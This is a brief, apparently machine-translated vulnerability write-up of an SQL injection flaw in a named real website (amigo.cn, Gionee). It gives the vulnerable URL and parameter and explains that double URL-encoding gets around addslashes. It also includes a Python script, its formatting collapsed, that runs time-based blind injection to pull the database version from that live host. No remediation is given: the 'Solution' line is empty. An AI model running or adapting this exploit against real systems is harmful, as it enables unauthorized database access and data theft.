Master station SQL injection of gionee OS (with py script)

Master station SQL injection of gionee OS (with py script)

~~~~~

Injection Point http://www.amigo.cn/ami_stat/ami_stat.php? Val2 = undefined & val1 = 111 * & type = search

The injection parameter is val1.

Normal detection fails. You need to use doubleencode.

The code behind visual testing is similar.
 

$id=$_GET['id'];    $id=addslashes($id);    echo $id."";    $id=urldecode($id);    echo $id."";

First addslashes and then url Decoding,

Therefore, you need to encode the payload before injecting it.

Time-based blind injection is slow, and the top 10 versions are guessed

The script is as follows:
 

#!/usr/bin/env python#-*-codnig:utf-8-*-import requestsfrom urllib import quoteimport timeurl = 'http://www.amigo.cn/ami_stat/ami_stat.php?val2=undefined&val1={}&type=search'payloads = '0123456789.abcdefghijklmnopqrstuvwxyz @_:'user = ''for i in range(1,10):for p in payloads:start_time = time.time()try:key = " 11' xor if(ascii(mid(version(),{},1))={},sleep(5),1) and '1'='1".format(i,ord(p))u = url.format(quote(quote(key)))req = requests.get(u,timeout=60)except Exception,msg:print msgprint keyif time.time() - start_time > 5:user = user + pprint "\n" + user + "\n"breakprint '\n\nFinish: ' + user

 

 

Solution:

You know ~~~~